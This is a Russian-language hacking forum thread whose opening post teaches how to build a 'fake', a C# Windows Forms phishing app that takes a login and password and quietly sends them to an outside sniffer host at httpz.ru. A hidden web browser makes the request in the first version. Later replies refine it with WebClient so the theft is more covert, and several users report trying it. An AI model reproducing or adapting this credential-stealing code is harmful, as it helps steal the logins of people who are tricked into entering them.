Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе
Вернуться   HPC / Кодинг / .NET / C#
 
  Страница 1
  , 21:56   #1
Banned
 
Регистрация: 24.05.2010
Сообщений: 411

Репутация: 0 / 0
Post Делаем фэйк на C#

Привет,так как я совсем недавно начал изучать C#, то решил попробывать написать фэйк, и так начнем.:bop:

1. Создаем новый проект > выбираем Приложение Windows Form.

2. Кидаем на форму : 2 TextBox и 1 Button и 1 webBrowser.

3. У webBrowser ставим свойство Visible = False

4. Кликаем 2 раза по кнопке и вписываем код :
code:
string adres;
            adres = "http://httpz.ru/алиас.gif?Login= " + textBox1.Text + "|Pass= " + textBox2.Text + ";";
            webBrowser1.Navigate(adres);
5. Запускаем вписываем какие-нибудь данные нажимаем на кнопку и смотрим отчет в логах на сниффере :popeye:


P.S.

Это самый простой вид фэйка, оформление и т.п. все зависит от вашей фантазии :bag:
 
Пользователь вне форума    
Наши Спонсоры
  , 02:54   #2
DWA
Местный
 
Аватар для DWA
 
Регистрация: 25.02.2010
Сообщений: 417

Репутация: 82 / 1
По умолчанию Re: Делаем фэйк на C#

Из за того что ты урезал статью в 2 раза, это не значит что можно не указывать автора
 
Пользователь вне форума    
  , 08:23   #3
Banned
 
Регистрация: 24.05.2010
Сообщений: 411

Репутация: 0 / 0
По умолчанию Re: Делаем фэйк на C#

o: Если что это моя статья ок ?
Не, я ничего не редактировал.
 

Последний раз редактировалось FrostArtes; 21.10.2010 в 09:00.
Пользователь вне форума    
  , 08:41   #4
DWA
Местный
 
Аватар для DWA
 
Регистрация: 25.02.2010
Сообщений: 417

Репутация: 82 / 1
По умолчанию Re: Делаем фэйк на C#

Ээ, сорь чет я затупил...сегодня с утра она мне казалось уж более на одну статью по C# похожа...видимо спросонья неразличил...или ты уже подредактировал...неважно короче
 
Пользователь вне форума    
  , 18:20   #5
Новичок
 
Регистрация: 10.09.2009
Сообщений: 5

Репутация: -6 / 0
По умолчанию Re: Делаем фэйк на C#

че то у меня не получается(
 
Пользователь вне форума    
  , 18:23   #6
Banned
 
Регистрация: 24.05.2010
Сообщений: 411

Репутация: 0 / 0
По умолчанию Re: Делаем фэйк на C#

ernarernar, что именно ?
 
Пользователь вне форума    
  , 07:50   #7
Новичок
 
Регистрация: 22.07.2010
Сообщений: 6

Репутация: 20 / 0
По умолчанию Re: Делаем фэйк на C#

а у меня получилось)))
 
Пользователь вне форума    
  , 23:09   #8
Местный
 
Регистрация: 29.04.2010
Сообщений: 130

Репутация: 21 / 1
По умолчанию Re: Делаем фэйк на C#

Нууу, тут самое сложно это осилить код на переход на url в webBrowser xD.
 
Пользователь вне форума    
  , 23:49   #9
Местный
 
Локация: Бутиратия
Регистрация: 13.08.2010
Сообщений: 385

Репутация: 0 / 0
По умолчанию Re: Делаем фэйк на C#

да что ты. посмотри на громаду кода. осилить это не каждому дано.
__________________
[B]А тебя %username% уже забанили?[/B]

icq# 610047
Пользователь вне форума    
  , 03:39   #10
Новичок
 
Регистрация: 22.04.2009
Сообщений: 1

Репутация: 0 / 0
По умолчанию

del
 
Пользователь вне форума    
  , 13:46   #11
Новичок
 
Регистрация: 20.03.2011
Сообщений: 10

Репутация: 0 / 0
По умолчанию

как-то не правильно юзать вебраузер ИМХО. Обычно у рядовых пользователей полно всяких плагов\своих настроек которые могут помешать скрыто перейти на снифф
лучше будет
source:
using System.Net;

WebClient HTTP = new WebClient();
HTTP.DownloadString("http://httpz.ru/алиас.gif?Login= " + textBox1.Text + "|Pass= " + textBox2.Text + ";");
 
Пользователь вне форума    
  , 13:54   #12
Местный
 
Аватар для kyle
 
Регистрация: 06.08.2010
Сообщений: 254

Репутация: 15 / 1
По умолчанию

Цитата:
Сообщение от byte Посмотреть сообщение
как-то не правильно юзать вебраузер ИМХО. Обычно у рядовых пользователей полно всяких плагов\своих настроек которые могут помешать скрыто перейти на снифф
лучше будет
source:
using System.Net;

WebClient HTTP = new WebClient();
HTTP.DownloadString("http://httpz.ru/алиас.gif?Login= " + textBox1.Text + "|Pass= " + textBox2.Text + ";");
А простым POST'ом разве не ещё проще?)
 
Пользователь вне форума    
  , 10:04   #13
DWA
Местный
 
Аватар для DWA
 
Регистрация: 25.02.2010
Сообщений: 417

Репутация: 82 / 1
По умолчанию

Цитата:
Сообщение от kyle
А простым POST'ом
Какой блин POST, когда здесь GET?

Цитата:
Сообщение от kyle
разве не ещё проще?)
Код выше делает так что проще и быстрее некуда, если ищешь приключений на задницу - пиши на сокетах, гораздо легче использовать HttpWebRequest и Response, но идеальный вариант WebClient который как раз создан для таких простых задач
 
Пользователь вне форума    
  , 12:23   #14
Новичок
 
Регистрация: 23.01.2013
Сообщений: 7

Репутация: 0 / 0
По умолчанию

снимете пж кто-нибудь видео а то я не совсем понимаю что к чему)
 
Пользователь вне форума    
  , 12:17   #15
Новичок
 
Регистрация: 05.03.2013
Сообщений: 6

Репутация: 0 / 0
По умолчанию

IMAGE http://s004.radikal.ru/i206/1303/6e/633367bf2925.jpg


Что не так?
 
Пользователь вне форума    

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Изменить фэйк. 1zer Оффтоп 4 01.05.2011 09:35
Делаем генератор бат вирусов festor007 Delphi 13 14.01.2011 10:38
Делаем постройку на плакат shtaketik Photoshop 3 23.04.2010 17:54



Часовой пояс GMT +2
Powered by vBulletin® 3.x.x Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © 2008 - 2013 «HPC» Реклама на сайте Правила Форума Пользовательское соглашение Работа на сайте
При копировании материалов ставьте ссылку на источник
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.